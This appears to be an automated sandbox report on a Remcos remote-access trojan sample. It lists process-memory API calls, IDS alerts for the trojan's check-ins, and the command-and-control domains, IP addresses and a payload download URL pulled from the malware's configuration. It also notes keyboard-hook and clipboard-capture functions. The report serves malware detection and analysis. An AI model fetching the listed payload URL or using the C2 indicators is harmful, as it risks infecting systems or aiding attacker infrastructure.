                  Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000004.00000003.1766895449.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000B.00000002.1870542553.0000000000D11000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.4.dr
                  Source: Binary string: easinvoker.pdbH source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: AWkpqJMxci.exe, 00000000.00000003.1666597559.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D605000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782458415.000000000238F000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D5CA000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E668000.00000004.00000020.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E63F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000A.00000000.1777848027.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000D.00000000.1873419118.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000E.00000002.1875239143.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1876616016.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.3.dr
                  Source: Binary string: ping.pdb source: esentutl.exe, 00000004.00000003.1766895449.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000B.00000002.1870542553.0000000000D11000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.4.dr
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_02885908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02885908
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B10207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,5_2_00B10207
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B1589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,5_2_00B1589A
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B14EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00B14EC1
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B23E66 FindFirstFileW,FindNextFileW,FindClose,5_2_00B23E66
                  Source: C:\Users\Public\alpha.pifCode function: 5_2_00B0532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,5_2_00B0532E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046696A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_046696A0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0466928E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0467C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0467C322
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0466C388
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0466BD72
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04667877 FindFirstFileW,FindNextFileW,8_2_04667877
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04668847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_04668847
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0466BB6B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04679B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_04679B86
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B1589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,10_2_00B1589A
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B10207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,10_2_00B10207
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B14EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00B14EC1
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B23E66 FindFirstFileW,FindNextFileW,FindClose,10_2_00B23E66
                  Source: C:\Users\Public\alpha.pifCode function: 10_2_00B0532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,10_2_00B0532E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0040928E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C322
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C388
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_004096A0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_00408847
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00407877 FindFirstFileW,FindNextFileW,17_2_00407877
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB6B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419B86
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD72
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05128592 FindFirstFileW,FindNextFileW,17_2_05128592
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512A3BB __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0512A3BB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512C886 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0512C886
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513A8A1 FindFirstFileW,17_2_0513A8A1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512CA8D FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0512CA8D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05129562 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_05129562
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0513D03D FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0513D03D
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_0512D0A3 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0512D0A3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05129FA9 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_05129FA9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04667CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_04667CD2

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49732 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49733 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49740 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49743 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49745 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49742 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49744 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49741 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49769 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49763 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49806 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49831 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49837 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49800 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49868 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49862 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49900 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49933 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49927 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49961 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49994 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49967 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50001 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49894 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50031 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50032 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50033 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50035 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50030 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50027 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50037 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50034 -> 162.216.243.15:2404
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50029 -> 192.169.69.26:2500
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50036 -> 162.216.243.15:2404
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0
                  Source: Malware configuration extractorURLs: ogcmaw.duckdns.org
                  Source: Malware configuration extractorURLs: emberluck.duckdns.org
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: ogcmaw.duckdns.org
                  Source: unknownDNS query: name: emberluck.duckdns.org
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exeCode function: 0_2_0289E4B8 InternetCheckConnectionA,0_2_0289E4B8
                  Source: global trafficTCP traffic: 192.168.2.4:49732 -> 162.216.243.15:2404
                  Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                  Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                  Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
                  Source: Joe Sandbox ViewASN Name: DYNUUS DYNUUS
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 142.250.181.33:443
                  Source: global trafficHTTP traffic detected: GET /download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04664B96 WaitForSingleObject,SetEvent,recv,8_2_04664B96
                  Source: global trafficHTTP traffic detected: GET /download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                  Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                  Source: global trafficDNS traffic detected: DNS query: ogcmaw.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: emberluck.duckdns.org
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: colorcpl.exe, SndVol.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: colorcpl.exe, 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: AWkpqJMxci.exe, AWkpqJMxci.exe, 00000000.00000002.1805021411.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                  Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.0000000000785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                  Source: AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D65F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0
                  Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.00000000007A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0?
                  Source: AWkpqJMxci.exe, 00000000.00000002.1781709227.00000000007AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0x
                  Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.4:49731 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466A2F3 SetWindowsHookExA 0000000D,0466A2DF,000000008_2_0466A2F3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466B749 OpenClipboard,GetClipboardData,CloseClipboard,8_2_0466B749
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046768FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_046768FC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_004168FC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_05137617 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_05137617
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466B749 OpenClipboard,GetClipboardData,CloseClipboard,8_2_0466B749
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0466A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,8_2_0466A41B
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
